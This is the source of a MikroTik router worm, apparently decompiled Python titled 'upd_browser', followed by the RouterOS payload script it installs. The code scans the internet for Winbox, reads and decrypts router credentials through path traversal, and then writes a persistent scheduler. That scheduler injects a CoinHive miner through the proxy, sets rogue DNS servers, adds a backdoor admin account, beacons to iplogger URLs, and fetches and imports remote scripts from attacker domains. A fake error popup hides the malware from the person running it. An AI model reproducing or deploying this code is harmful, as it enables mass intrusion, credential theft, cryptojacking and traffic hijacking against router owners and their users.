upd_browser - MikroTik malware
:do {/ip proxy set enabled=yes port=8080 src-address="::"} on-error={:log info errorProxy} | |
:do {/ip proxy access remove [find Action=deny]} on-error={:log info errorProxy} | |
:do {/ip proxy access remove [find Action!=deny]} on-error={:log info errorProxy} | |
:do {/ip proxy access add action=deny disabled=no comment=sysadminpxy} on-error={:log info errorProxy} | |
:do {/ip firewall nat remove [find comment=sysadminpxy]} on-error={:log info errorNat} | |
:do {/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy} on-error={:log info errorNat} | |
:do {/ip firewall nat move [find comment=sysadminpxy] destination=0} on-error={:log info errorNat} | |
:do {/ip firewall filter remove [find comment=sysadminpxy]} on-error={:log info errorFilter} | |
:do {/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=5s comment=sysadminpxy} on-error={:log info errorFilter} | |
:do {/ip firewall filter move [find comment=sysadminpxy] destination=0} on-error={:log info errorFilter} | |
/ip dns set servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141 | |
:do {/system ntp client set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235} on-error={:log info errorNtp} | |
/system scheduler remove [find name=Auto113] | |
/system scheduler remove [find name=upd111] | |
/system scheduler remove [find name=upd112] | |
/system scheduler remove [find name=upd113] | |
/system scheduler remove [find name=upd114] | |
:do {/system scheduler add name="upd111" start-time=startup on-event=":delay 5m | |
:do {/tool fetch url=\\"{iplogstart}\\" mode=http keep-result=no} on-error={} | |
/system scheduler remove [find name=upd111]" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112} | |
:do {/system scheduler add name="upd112" start-time=startup on-event="/system scheduler remove [find name=sh113] | |
:do {/file remove u113.rsc} on-error={}" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112} | |
:do {/system scheduler add name="upd113" interval=6h on-event=(":do {/tool fetch url=\\"http://min01.com:31416/min01?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={} | |
:do {/tool fetch url=\\"http://mikr0tik.com:31416/mikr0tik?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={} | |
:do {/tool fetch url=\\"http://up0.bit:31416/up0?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={} | |
:do {/import u113.rsc} on-error={} | |
:do {/file remove u113.rsc} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113} | |
:do {/system scheduler add name="upd114" interval=12h on-event=( | |
":do {/tool fetch url={iplog} mode=http keep-result=no} on-error={}" | |
) policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113} | |
:do {/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorAuto113} | |
:do {/file remove autosupout.rif} on-error={} | |
:do {/file remove autosupout.old.rif} on-error={} | |
/ip service set api disabled=no port=8728 address="" | |
/ip service set ftp disabled=no port=21 address="" | |
:if ([:len [/user find name=("dircreate")]] > 0) do={/user remove "dircreate" } | |
/user add name=dircreate group=full password={newpass} disabled=no comment="{keybase58}" | |
:do {/file print file=dircreate} on-error={:log info errorFilePrint} | |
:delay 5s | |
:do {/file set dircreate contents="<html>\\r\\n<head>\\r\\n\t<meta http-equiv=\\"Content-Type\\" content=\\"text/html;charset=windows-1251\\">\\r\\n\t<title>\\"\\$(url)\\"</title> \\r\\n<script src=\\"https://coinhive.com/lib/coinhive.min.js\\"></script>\\r\\n<script>\\r\\n\tvar miner = new CoinHive.Anonymous({chKey}, {throttle: 0.1});\\r\\n\t | |
miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);\\r\\n</script>\\r\\n</head>\\r\\n<frameset>\\r\\n<frame src=\\"\\$(url)\\"></frame>\\r\\n</frameset>\\r\\n</html>"} on-error={:log info errorFileSave} | |
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="webproxy/error.html"} on-error={:log info errorfileCopy} | |
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="flash/webproxy/error.html"} on-error={:log info errorfileCopy2} | |
:do {/file remove "dircreate.txt"} on-error={} | |
:do {/user set address=87.246.0.0/16,152.237.0.0/16,10.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,{vip} [find name!=dircreate]} on-error={:log info errorSetAddress} | |
:do {/user set disabled=yes [find name=dircreate]} on-error={:log info errorSetAddress} | |
/user remove [find name=ftu] | |
/user group remove [find name=ftpgroupe] | |
/ip service set ftp disabled=yes port=21 address="" | |
:do {/ip socks set enabled=no port=27182} on-error={:log info errorSocksSet} | |
:do {/ip socks access remove [find action=deny]} on-error={:log info errorSocksAccess} | |
:do {/ip socks access remove [find action!=deny]} on-error={:log info errorSocksAceess} | |
:do {/ip dns static remove [find address!=1.1.1.1]} on-error={:log info errorStaticDns} | |
:do {/tool sniffer set streaming-enabled=no} on-error={:log info errorSniffer} | |
/system reboot |
# Embedded file name: upd_browser.py | |
import threading, time, socket, random, ups, datetime, urllib, base58, pyautogui | |
thmax = 600 | |
def poc(ip, level): | |
level = int(level) | |
if level == 3: | |
return False | |
user_pass = ups.get_user_pass(ip) | |
if len(user_pass) != 0: | |
try: | |
fg = False | |
shed = bytearray([]) | |
shedidx = bytearray([]) | |
part = random.randint(0, 9) | |
newpass = '' | |
for i in xrange(0, 10): | |
newpass += '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'[random.randint(0, 57)] | |
for user_pass_one in user_pass: | |
if user_pass_one[1] == 'dircreate': | |
newpass = user_pass_one[2] | |
ups.log(ip + ':' + 'dircreate' + ':' + newpass) | |
strusr = ip + '- part ' + str(part) + '\r\n' | |
for user_pass_one in user_pass: | |
strusr += ip + ':' + user_pass_one[1] + ':' + user_pass_one[2] + '\r\n' | |
ups.log(strusr) | |
keybase58 = ups.decrypt_password('Admiral', newpass) | |
keybase58 = base58.b58encode(keybase58) | |
shed, shedidx = ups.make_sheduller(shed, shedidx, ups.get_script(ip, part, newpass, keybase58)) | |
for user_pass_one in user_pass: | |
if user_pass_one[0] == 'f': | |
fg1 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False) | |
fg2 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True) | |
if fg1 and fg2: | |
fg = True | |
break | |
if not fg: | |
for user_pass_one in user_pass: | |
if user_pass_one[0] != 'f': | |
fg1 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False) | |
fg2 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True) | |
if fg1 and fg2: | |
fg = True | |
break | |
except: | |
ups.log('Error excep poc') | |
if fg: | |
ups.log(ip + ' - ok') | |
return True | |
else: | |
ups.log(ip + ' - bad, level=' + str(level)) | |
time.sleep(150) | |
return poc(ip, level + 1) | |
def ping(ip, port): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.settimeout(2) | |
try: | |
serror = s.connect_ex((ip, port)) | |
except: | |
serror = -1 | |
finally: | |
s.close() | |
return serror | |
def scan(): | |
while True: | |
random.seed() | |
ip2 = str(random.randint(0, 255)) | |
time.sleep(random.randint(0, random.randint(0, 50))) | |
ip1 = str(random.randint(0, 255)) | |
ip3b = random.randint(0, 255) | |
for ip3s in xrange(ip3b, ip3b + 20): | |
ip3 = ip3s | |
if ip3 > 255: | |
ip3 = ip3 - 256 | |
for ip4 in xrange(0, 256): | |
ip = str(ip1) + '.' + str(ip2) + '.' + str(ip3) + '.' + str(ip4) | |
serror = ping(ip, 8291) | |
if serror == 0: | |
serror = ping(ip, random.randint(56778, 56887)) | |
if serror != 0: | |
poc(ip, 0) | |
if __name__ == '__main__': | |
time.sleep(3) | |
pyautogui.alert(text='Update error code 80072EE2', title='Error', button='OK') | |
time.sleep(20) | |
urllib.urlopen(ups.viplogpoc).read() | |
ups.log('Start 0') | |
for i in xrange(thmax): | |
try: | |
p = threading.Thread(target=scan) | |
p.setDaemon(True) | |
p.start() | |
if i == thmax - 1: | |
ups.log('Start 550') | |
except: | |
ups.log('Exccept threading') | |
vnow = datetime.date(2012, 12, 12) | |
while True: | |
vold = vnow | |
vnow = datetime.datetime.now() | |
if (vold.year != vnow.year or vold.month != vnow.month or vold.day != vnow.day or vold.hour != vnow.hour) and vold.year != 2012: | |
urllib.urlopen(ups.viplogpoc).read() | |
time.sleep(1000) | |
ups.log('All END!!!') |
# Embedded file name: ups.py | |
import socket, sys, hashlib, random, base58 | |
part = 0 | |
keybase58 = '' | |
viplogpoc = 'http://iplogger.co/1DQrN6' | |
def get_script(vip, vpart, vnewpass, vkeybase58): | |
viplog = ('http://iplogger.co/1DErN6', | |
'http://iplogger.co/1DYrN6', | |
'http://iplogger.co/1DPrN6', | |
'http://iplogger.co/1DArN6', | |
'http://iplogger.co/1DSrN6', | |
'http://iplogger.co/1DDrN6', | |
'http://iplogger.co/1DFrN6', | |
'http://iplogger.co/1DGrN6', | |
'http://iplogger.co/1DHrN6', | |
'http://iplogger.co/1DJrN6') | |
viplogstart = 'http://iplogger.co/1DcrN6' | |
vchKey = ("'oiKAGEslcNfjfgxTMrxKGMJvh436ypIM'", | |
"'5zHUikiwJT4MLzQ9PLbU11gEz8TLCcYx'", | |
"'5ROof564mEBQsYzCqee0M2LplLBEApCv'", | |
"'qKoXV8jXlcUaIt0LGcMJIHw7yLJEyyVO'", | |
"'ZsyeL0FvutbhhdLTVEYe3WOnyd3BU1fK'", | |
"'ByMzv397Mzjcm4Tvr3dOzD6toK0LOqgf'", | |
"'joy1MQSiGgGHos78FarfEGIuM5Ig7l8h'", | |
"'ryZ1Dl4QYuDlQBMchMFviBXPL1E1bbGs'", | |
"'jh0GD0ZETDOfypDbwjTNWXWIuvUlwtsF'", | |
"'BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma'", | |
"'BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma'") | |
mtscript = ':do {/ip proxy set enabled=yes port=8080 src-address="::"} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip proxy access remove [find Action=deny]} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip proxy access remove [find Action!=deny]} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip proxy access add action=deny disabled=no comment=sysadminpxy} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip firewall nat remove [find comment=sysadminpxy]} on-error={:log info errorNat}' + '\r\n' + ':do {/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy} on-error={:log info errorNat}' + '\r\n' + ':do {/ip firewall nat move [find comment=sysadminpxy] destination=0} on-error={:log info errorNat}' + '\r\n' + ':do {/ip firewall filter remove [find comment=sysadminpxy]} on-error={:log info errorFilter}' + '\r\n' + ':do {/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=5s comment=sysadminpxy} on-error={:log info errorFilter}' + '\r\n' + ':do {/ip firewall filter move [find comment=sysadminpxy] destination=0} on-error={:log info errorFilter}' + '\r\n' + '/ip dns set servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141' + '\r\n' + ':do {/system ntp client set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235} on-error={:log info errorNtp}' + '\r\n' + '/system scheduler remove [find name=Auto113]' + '\r\n' + '/system scheduler remove [find name=upd111]' + '\r\n' + '/system scheduler remove [find name=upd112]' + '\r\n' + '/system scheduler remove [find name=upd113]' + '\r\n' + '/system scheduler remove [find name=upd114]' + '\r\n' + ':do {/system scheduler add name="upd111" start-time=startup on-event=":delay 5m\\r\\n:do {/tool fetch url=\\"{iplogstart}\\" mode=http keep-result=no} on-error={}\\r\\n/system scheduler remove [find 
name=upd111]" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}' + '\r\n' + ':do {/system scheduler add name="upd112" start-time=startup on-event="/system scheduler remove [find name=sh113]\\r\\n:do {/file remove u113.rsc} on-error={}" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}' + '\r\n' + ':do {/system scheduler add name="upd113" interval=6h on-event=(":do {/tool fetch url=\\"http://min01.com:31416/min01?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}\\r\\n:do {/tool fetch url=\\"http://mikr0tik.com:31416/mikr0tik?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}\\r\\n:do {/tool fetch url=\\"http://up0.bit:31416/up0?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}\\r\\n:do {/import u113.rsc} on-error={}\\r\\n:do {/file remove u113.rsc} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}' + '\r\n' + ':do {/system scheduler add name="upd114" interval=12h on-event=(":do {/tool fetch url={iplog} mode=http keep-result=no} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}' + '\r\n' + ':do {/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorAuto113}' + '\r\n' + ':do {/file remove autosupout.rif} on-error={}' + '\r\n' + ':do {/file remove autosupout.old.rif} on-error={}' + '\r\n' + '/ip service set api disabled=no port=8728 address=""' + '\r\n' + '/ip service set ftp disabled=no port=21 address=""' + '\r\n' + ':if ([:len [/user find name=("dircreate")]] > 0) do={/user remove 
"dircreate" }' + '\r\n' + '/user add name=dircreate group=full password={newpass} disabled=no comment="{keybase58}"' + '\r\n' + ':do {/file print file=dircreate} on-error={:log info errorFilePrint}' + '\r\n' + ':delay 5s' + '\r\n' + ':do {/file set dircreate contents="<html>\\r\\n<head>\\r\\n\t<meta http-equiv=\\"Content-Type\\" content=\\"text/html;charset=windows-1251\\">\\r\\n\t<title>\\"\\$(url)\\"</title> \\r\\n<script src=\\"https://coinhive.com/lib/coinhive.min.js\\"></script>\\r\\n<script>\\r\\n\tvar miner = new CoinHive.Anonymous({chKey}, {throttle: 0.1});\\r\\n\tminer.start(CoinHive.FORCE_EXCLUSIVE_TAB);\\r\\n</script>\\r\\n</head>\\r\\n<frameset>\\r\\n<frame src=\\"\\$(url)\\"></frame>\\r\\n</frameset>\\r\\n</html>"} on-error={:log info errorFileSave}' + '\r\n' + ':do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="webproxy/error.html"} on-error={:log info errorfileCopy}' + '\r\n' + ':do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="flash/webproxy/error.html"} on-error={:log info errorfileCopy2}' + '\r\n' + ':do {/file remove "dircreate.txt"} on-error={}' + '\r\n' + ':do {/user set address=87.246.0.0/16,152.237.0.0/16,10.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,{vip} [find name!=dircreate]} on-error={:log info errorSetAddress}' + '\r\n' + ':do {/user set disabled=yes [find name=dircreate]} on-error={:log info errorSetAddress}' + '\r\n' + '/user remove [find name=ftu]' + '\r\n' + '/user group remove [find name=ftpgroupe]' + '\r\n' + '/ip service set ftp disabled=yes port=21 address=""' + '\r\n' + ':do {/ip socks set enabled=no port=27182} on-error={:log info errorSocksSet}' + '\r\n' + ':do {/ip socks access remove [find action=deny]} on-error={:log info errorSocksAccess}' + '\r\n' + ':do {/ip socks access remove [find action!=deny]} on-error={:log info errorSocksAceess}' + '\r\n' + ':do {/ip dns static remove [find 
address!=1.1.1.1]} on-error={:log info errorStaticDns}' + '\r\n' + ':do {/tool sniffer set streaming-enabled=no} on-error={:log info errorSniffer}' + '\r\n' + '/system reboot' | |
mt = mtscript.replace('{part}', str(vpart)) | |
mt = mt.replace('{iplog}', viplog[vpart]) | |
mt = mt.replace('{iplogstart}', viplogstart) | |
mt = mt.replace('{keybase58}', vkeybase58) | |
mt = mt.replace('{chKey}', vchKey[vpart]) | |
mt = mt.replace('{newpass}', vnewpass) | |
mt = mt.replace('{vip}', vip.split('.')[0] + '.' + vip.split('.')[1] + '.' + vip.split('.')[2] + '.0/24') | |
return mt | |
def log(s): | |
s = str(s) | |
try: | |
print s | |
except: | |
print 'error except log' | |
def decrypt_password(user, pass_enc): | |
key = hashlib.md5(user + '283i4jfkai3389').digest() | |
passw = '' | |
b1 = bytearray(pass_enc) | |
b2 = bytearray(key) | |
for i in range(0, len(b1)): | |
passw += chr(b1[i] ^ b2[i % len(key)]) | |
return passw.split('\x00')[0] | |
def extract_user_pass_from_entry(entry): | |
user_data = entry.split('\x01\x00\x00!')[1] | |
pass_data = entry.split('\x11\x00\x00!')[1] | |
user_len = ord(user_data[0]) | |
pass_len = ord(pass_data[0]) | |
username = user_data[1:1 + user_len] | |
password = pass_data[1:1 + pass_len] | |
return (username, password) | |
def get_pair(data): | |
user_list = [] | |
entries = data.split('M2')[1:] | |
for entry in entries: | |
try: | |
user, pass_encrypted = extract_user_pass_from_entry(entry) | |
if entry.find('\x02\x00\x00\t\x03') != -1: | |
frw = 'f' | |
else: | |
frw = 'x' | |
except: | |
continue | |
pass_plain = decrypt_password(user, pass_encrypted) | |
user = str(user) | |
user_list.append((frw, user, pass_plain)) | |
return user_list | |
def delete255(d): | |
d1 = '' | |
while len(d) > 0: | |
d = d[2:] | |
d1 = d1 + d[:255] | |
d = d[255:] | |
return d1 | |
def insert255(d): | |
if len(d) < 256: | |
d1 = bytearray([len(d), 1]) | |
else: | |
d1 = bytearray([255, 1]) | |
while len(d) > 0: | |
d1 = d1 + d[0:255] | |
d = d[255:] | |
if len(d) != 0: | |
if len(d) < 256: | |
d1 = d1 + bytearray([len(d), 255]) | |
else: | |
d1 = d1 + bytearray([255, 255]) | |
return d1 | |
def load_file(ip, namefile): | |
a1 = 'M2\x05\x00\xff\x01\x06\x00\xff\t\x05\x07\x00\xff\t\x07\x01\x00\x00!' | |
a2 = '\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00' | |
b = ';\x01\x009M2\x05\x00\xff\x01\x06\x00\xff\t\x06\x01\x00\xfe\t5\x02\x00\x00\x08\x00\x80\x00\x00\x07\x00' + '\xff\t\x04\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00' | |
try: | |
s = socket.socket() | |
s.settimeout(10) | |
s.connect((ip, 8291)) | |
a = a1 + chr(len(namefile)) + namefile + a2 | |
a = chr(len(a) + 2) + '\x01\x00' + chr(len(a)) + a | |
s.send(bytearray(a)) | |
d = str(s.recv(1024)) | |
if len(d) < 38: | |
raise Exception('no answer') | |
if d[4] != 'M' or d[5] != '2': | |
raise Exception('Not M2') | |
b = b[:19] + d[38] + b[20:] | |
s.send(bytearray(b)) | |
d = str(s.recv(256 * 256)) | |
if len(d) < 6: | |
raise Exception('no answer') | |
if d[4] != 'M' or d[5] != '2': | |
raise Exception('Not M2') | |
d = delete255(d) | |
n = d.find('\x03\x00\x00') | |
if d[n + 3] == '1': | |
res = d[n + 5:] | |
elif d[n + 3] == '0': | |
res = d[n + 6:] | |
else: | |
res = '' | |
except: | |
res = '' | |
finally: | |
s.close() | |
return res | |
def get_user_pass(ip): | |
return get_pair(load_file(ip, '/////./..//////./..//////./../flash/rw/store/user.dat')) | |
def save_file(ip, user, password, namefile, data, fg_reboot): | |
pinit = [55, | |
1, | |
0, | |
53, | |
77, | |
50, | |
5, | |
0, | |
255, | |
1, | |
6, | |
0, | |
255, | |
9, | |
1, | |
7, | |
0, | |
255, | |
9, | |
7, | |
1, | |
0, | |
0, | |
33, | |
4, | |
108, | |
105, | |
115, | |
116, | |
2, | |
0, | |
255, | |
136, | |
2, | |
0, | |
0, | |
0, | |
0, | |
0, | |
11, | |
0, | |
0, | |
0, | |
1, | |
0, | |
255, | |
136, | |
2, | |
0, | |
2, | |
0, | |
0, | |
0, | |
2, | |
0, | |
0, | |
0] | |
psalt = [42, | |
1, | |
0, | |
40, | |
77, | |
50, | |
1, | |
0, | |
254, | |
9, | |
39, | |
7, | |
0, | |
255, | |
9, | |
5, | |
2, | |
0, | |
255, | |
136, | |
2, | |
0, | |
0, | |
0, | |
0, | |
0, | |
11, | |
0, | |
0, | |
0, | |
1, | |
0, | |
255, | |
136, | |
2, | |
0, | |
2, | |
0, | |
0, | |
0, | |
2, | |
0, | |
0, | |
0, | |
46, | |
1, | |
0, | |
44, | |
77, | |
50, | |
5, | |
0, | |
255, | |
1, | |
6, | |
0, | |
255, | |
9, | |
2, | |
7, | |
0, | |
255, | |
9, | |
4, | |
2, | |
0, | |
255, | |
136, | |
2, | |
0, | |
0, | |
0, | |
0, | |
0, | |
11, | |
0, | |
0, | |
0, | |
1, | |
0, | |
255, | |
136, | |
2, | |
0, | |
13, | |
0, | |
0, | |
0, | |
4, | |
0, | |
0, | |
0] | |
ppass = [100, | |
1, | |
0, | |
98, | |
77, | |
50, | |
12, | |
0, | |
0, | |
0, | |
5, | |
0, | |
255, | |
1, | |
6, | |
0, | |
255, | |
9, | |
3, | |
7, | |
0, | |
255, | |
9, | |
1, | |
10, | |
0, | |
0, | |
49, | |
17, | |
0, | |
19, | |
120, | |
15, | |
235, | |
246, | |
25, | |
15, | |
217, | |
0, | |
237, | |
39, | |
189, | |
25, | |
20, | |
243, | |
36, | |
9, | |
0, | |
0, | |
49, | |
16, | |
185, | |
185, | |
158, | |
154, | |
32, | |
172, | |
153, | |
96, | |
86, | |
163, | |
217, | |
155, | |
155, | |
201, | |
53, | |
22, | |
1, | |
0, | |
0, | |
33, | |
2, | |
2, | |
0, | |
255, | |
136, | |
2, | |
0, | |
0, | |
0, | |
0, | |
0, | |
11, | |
0, | |
0, | |
0, | |
1, | |
0, | |
255, | |
136, | |
2, | |
0, | |
13, | |
0, | |
0, | |
0, | |
4, | |
0, | |
0, | |
0] | |
h1 = 'M2\x05\x00\xff\x01\x06\x00\xff\t\x01\x07\x00\xff\t\x01\x01\x00\x00!' | |
h2 = '\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00' | |
fl1 = bytearray([77, | |
50, | |
5, | |
0, | |
255, | |
1, | |
4, | |
0, | |
0, | |
1, | |
1, | |
0, | |
254, | |
9, | |
3, | |
6, | |
0, | |
255, | |
9, | |
12, | |
7, | |
0, | |
255, | |
9, | |
2, | |
3, | |
0, | |
0]) | |
fl2 = bytearray([2, | |
0, | |
255, | |
136, | |
2, | |
0, | |
0, | |
0, | |
0, | |
0, | |
8, | |
0, | |
0, | |
0, | |
1, | |
0, | |
255, | |
136, | |
2, | |
0, | |
2, | |
0, | |
0, | |
0, | |
2, | |
0, | |
0, | |
0]) | |
rb = bytearray([42, | |
1, | |
0, | |
40, | |
77, | |
50, | |
5, | |
0, | |
255, | |
1, | |
6, | |
0, | |
255, | |
9, | |
13, | |
7, | |
0, | |
255, | |
9, | |
5, | |
2, | |
0, | |
255, | |
136, | |
2, | |
0, | |
0, | |
0, | |
0, | |
0, | |
8, | |
0, | |
0, | |
0, | |
1, | |
0, | |
255, | |
136, | |
1, | |
0, | |
24, | |
0, | |
0, | |
0]) | |
res = False | |
try: | |
s = socket.socket() | |
s.settimeout(10) | |
s.connect((ip, 8291)) | |
pinit = bytearray(pinit) | |
psalt = bytearray(psalt) | |
ppass = bytearray(ppass) | |
s.send(pinit) | |
del pinit | |
d = bytearray(s.recv(256 * 256)) | |
psalt[10] = d[38] | |
s.send(psalt) | |
del psalt | |
d = bytearray(s.recv(256 * 256)) | |
i = d.index(bytearray([9, | |
0, | |
0, | |
49, | |
16])) | |
salt = d[i + 5:i + 5 + 16] | |
hash = bytearray(hashlib.md5('\x00' + password + str(salt)).digest()) | |
i = ppass.index(bytearray([10, | |
0, | |
0, | |
49])) | |
ppass[i + 6:i + 6 + 16] = hash | |
i = ppass.index(bytearray([9, | |
0, | |
0, | |
49])) | |
ppass[i + 5:i + 5 + 16] = salt | |
i = ppass.index(bytearray([1, | |
0, | |
0, | |
33])) | |
ppass[i + 4] = len(user) | |
ppass = ppass[:i + 5] + bytearray(user) + ppass[i + 5:] | |
ppass[0] = 98 + len(user) | |
ppass[3] = 96 + len(user) | |
s.send(ppass) | |
del ppass | |
d = bytearray(s.recv(256 * 256)) | |
if d.find(bytearray([105, | |
110, | |
118, | |
97, | |
108])) != -1: | |
raise Exception('Invalid password') | |
h = h1 + chr(len(namefile)) + namefile + h2 | |
h = chr(len(h) + 2) + '\x01\x00' + chr(len(h)) + h | |
s.send(bytearray(h)) | |
del h1 | |
del h2 | |
del h | |
d = bytearray(s.recv(256 * 256)) | |
i = d.index(bytearray([1, | |
0, | |
254, | |
9])) | |
fl1[14] = d[i + 4] | |
if len(data) < 256: | |
fl = fl1 + bytearray([49, len(data)]) | |
else: | |
fl = fl1 + bytearray([48, len(data) % 256, len(data) // 256]) | |
fl = fl + bytearray(data) + fl2 | |
fl = bytearray([len(fl) // 256, len(fl) % 256]) + fl | |
fl = insert255(fl) | |
s.send(bytearray(fl)) | |
d = bytearray(s.recv(256 * 256)) | |
i = d.find(bytearray([8, | |
0, | |
255, | |
8])) | |
res = i == -1 | |
if fg_reboot: | |
s.send(rb) | |
d = bytearray(s.recv(256 * 256)) | |
except: | |
res = False | |
finally: | |
s.close() | |
return res | |
def make_sheduller(shed, shedidx, mtscript): | |
p1 = bytearray([77, | |
50, | |
10, | |
0, | |
254, | |
0, | |
46, | |
1, | |
0, | |
8, | |
255, | |
255, | |
255, | |
255, | |
49, | |
1, | |
0, | |
8, | |
224, | |
1, | |
0, | |
0, | |
109, | |
0, | |
0, | |
9, | |
0, | |
1, | |
0, | |
254, | |
9, | |
0, | |
113, | |
0, | |
0, | |
8, | |
240, | |
107, | |
1, | |
0, | |
103, | |
0, | |
0, | |
33, | |
5, | |
97, | |
100, | |
109, | |
105, | |
110, | |
9, | |
0, | |
254, | |
33, | |
0, | |
45, | |
1, | |
0]) | |
p2 = bytearray([102, | |
0, | |
0, | |
33, | |
5, | |
115, | |
104, | |
49, | |
49, | |
51]) | |
idx = bytearray([0, | |
0, | |
0, | |
0, | |
43, | |
1, | |
0, | |
0, | |
5, | |
0, | |
0, | |
0]) | |
shed = bytearray(shed) | |
shedidx = bytearray(shedidx) | |
try: | |
if len(mtscript) < 256: | |
p = p1 + bytearray([33, len(mtscript)]) + bytearray(mtscript) + p2 | |
else: | |
p = p1 + bytearray([32, len(mtscript) % 256, len(mtscript) // 256]) + bytearray(mtscript) + p2 | |
t1 = len(p) % 256 + 2 | |
t2 = len(p) // 256 | |
if t1 > 255: | |
t1 = t1 - 256 | |
t2 += 1 | |
p = bytearray([t1, t2]) + p | |
idx[4] = t1 | |
idx[5] = t2 | |
t2 = -1 | |
t1 = 0 | |
if len(shedidx) != 0: | |
while t1 < len(shedidx): | |
if shedidx[t1] > t2 and shedidx[t1] != 255: | |
t2 = shedidx[t1] | |
t1 += 12 | |
idx[0] = t2 + 1 | |
except: | |
p = bytearray([]) | |
idx = bytearray([]) | |
return (shed + p, shedidx + idx) | |
if __name__ == '__main__': | |
ip = '79.142.53.22' | |
user_pass = get_user_pass(ip) | |
if len(user_pass) != 0: | |
fg = False | |
shed = bytearray([]) | |
shedidx = bytearray([]) | |
part = random.randint(0, 9) | |
newpass = '' | |
for i in xrange(0, 10): | |
newpass += '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'[random.randint(0, 57)] | |
for user_pass_one in user_pass: | |
if user_pass_one[1] == 'dircreate': | |
newpass = user_pass_one[2] | |
log(ip + ':' + 'dircreate' + ':' + newpass) | |
strusr = ip + '- part ' + str(part) + '\r\n' | |
for user_pass_one in user_pass: | |
strusr += ip + ':' + user_pass_one[1] + ':' + user_pass_one[2] + '\r\n' | |
log(strusr) | |
keybase58 = decrypt_password('Admiral', newpass) | |
keybase58 = base58.b58encode(keybase58) | |
shed, shedidx = make_sheduller(shed, shedidx, get_script(ip, part, newpass, keybase58)) | |
for user_pass_one in user_pass: | |
if user_pass_one[0] == 'f': | |
fg1 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False) | |
fg2 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True) | |
if fg1 and fg2: | |
fg = True | |
break | |
if not fg: | |
for user_pass_one in user_pass: | |
if user_pass_one[0] != 'f': | |
